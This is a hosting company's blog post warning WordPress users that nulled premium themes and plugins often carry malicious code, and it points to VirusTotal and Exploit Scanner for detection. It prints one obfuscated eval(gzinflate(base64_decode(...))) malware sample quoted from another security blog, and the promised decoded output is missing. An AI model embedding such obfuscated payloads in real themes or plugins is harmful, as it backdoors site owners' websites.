As a web hosting company we often have customers contacting our customer support concerned about the security of there website. The majority of the time its concerns about WordPress security. Being the most popular open source CMS on the market the amount of users is huge. Our web hosting platforms allow you to 1 click install WordPress in under 2 minutes. It’s no wonder that its the number one choice of CMS to use for your website.
Many beginners and novices are often confused as to how to use WordPress and even the right theme and plugins to use. Quite a few customers have absolutely no idea on how to design or template a WordPress theme or plugin for there specific needs. It’s thus no surprise that nearly all of them opt for pre-made themes and plugins that tick there web development requirements.
The Official WordPress repository and online marketplaces are full of free and premium themes that can be used to deploy a custom website with custom functionality. Here in lies the problem. You cannot trust each and every one of those sites.
There are a multitude of websites out there that allow you to download themes and plugins apart from the Official WordPress repository. In most cases its not entirely obvious that many of the themes and plugins are actually ‘premium’ plugins that cost money. These are the so-called “nulled” themes and plugins that have been hacked to allow anyone to download and effectively use them for there website.
This in 100% of the cases a big ‘no no’. You shouldn’t be using nulled themes and/or plugins on your website. It presents a huge WordPress security risk. Nearly all of the nulled WordPress themes and plugins have malicious code embedded in one or more of the files. You may be asking why this is an issue? well here are a number of reasons:
- To gain admin access to your WordPress admin section.
- To acquire a link back to there sites.
- Simply to bring your website down.
- To inject malicious ads into your website.
Here is a brilliant article posted on the Scurri website blog that shows why its a bad idea to use nulled themes and plugins. They give a few examples of inserted malicious code like:
eval (gzinflate( base64 _decode("NdLJlmNQAADQX8muqo6FIKZTXV0HEUKixCybPsIzBOGZHu/ruzf9B3dxd9+/f333Zb8DS9Ls3gtcvfImmcD7IxkBd/ iTgbTLwPublZ2MEZ6RJB1vkD/yYYV8OdYhuTCXwq+1882AVrOXpUJzbr507gkxWLZRYOfc5llCsyRMdIZxv+sW6N0ICq6h6Bm/ 5us1pVADcjlCnsm5tttpIWyHnzkwyMqVJTOupEbLBCE50lcVtKnLKc999/JlZDWRcO8yqve1TKRiND7ZXnsJBW5L0zwJVuFQMQmXgTPLNZnw/PCObVCZ+YO56TOih0TzlIvhqgqpH+jUUgfVXVFrVPDRk6eKdDL1aNQgr2J5wB5Z0GErnQ3muWGF6ktS9a27sYinLuRjpUrQK6GktGCw+pMNqVq84FQCnQBKqUw3vjvT6B8ZyJAgDuEcimHia1660nhruAX71qNCOBjmvMw9q6DN4ukIgufPUyQNmX9ao1YPak6p96OGzSZoj86NPlkXEWnUvSBQzJouKDYxdsKoOTDeA3sxP17dWfxxs4S8HyeWkcYWsmMYieaS2TVR0RfOgw2Xygbrv6I03xIkKlQNfGUTmj4wsOgQdvailUayKYpaL8EVwG1aJTgcMufcgbogTeEAtf1pXp6EzYiru0XYPkcCT/I6+vp623187D4+d/+L/QU=" )) );
which when decoded gives you the following result:
You can clearly see from the examples that they give in the article that the malicious code can have a very negative effect to your website.
A study was also completed by a Netherlands based company called Fox-IT on WordPress security. They published a 50 page white paper on the CryptoPHP Backdoor its a bit of a read which will make sense to seasoned web developers.
For everyone else the WordFence security team, who have a very popular free WordPress security plugin aptly named ‘WordFence’, have summarised the white paper here: http://www.wordfence.com/blog/2014/11/wordpress-security-nulled-scripts-cryptophp-infection/
Detecting and addressing Malicious code for WordPress Security in Nulled Plugins
First and foremost to make sure your WordPress install is secure and you are NOT compromising your WordPress security DON’T download ‘nulled’ themes and plugins. Its that simple. If you have inadvertently added a nulled theme or plugin OR are simply not bothered (which isn’t a good idea) here are a few things you can do:
Virus Total – If you think that you have infected files you can use this free online web checker to inspect your files and folders. You have to upload suspicious files and folders to start the check. It runs checks using all the popular anti virus checkers to see if your files and folder have malicious code. It’s fast and free to use. You can go to Virus Total here.
If you need to check files that are already installed on your WordPress site then there is an alternative option. You can install Exploit Scanner which will perform a scan of all files to see if you are vulnerable. Its a very simple and easy tool to use.
In our next post we will tell you about the best WordPress security plugins we find invaluable in 2015 to use if you want to stay proactive about the security of your WordPress based site.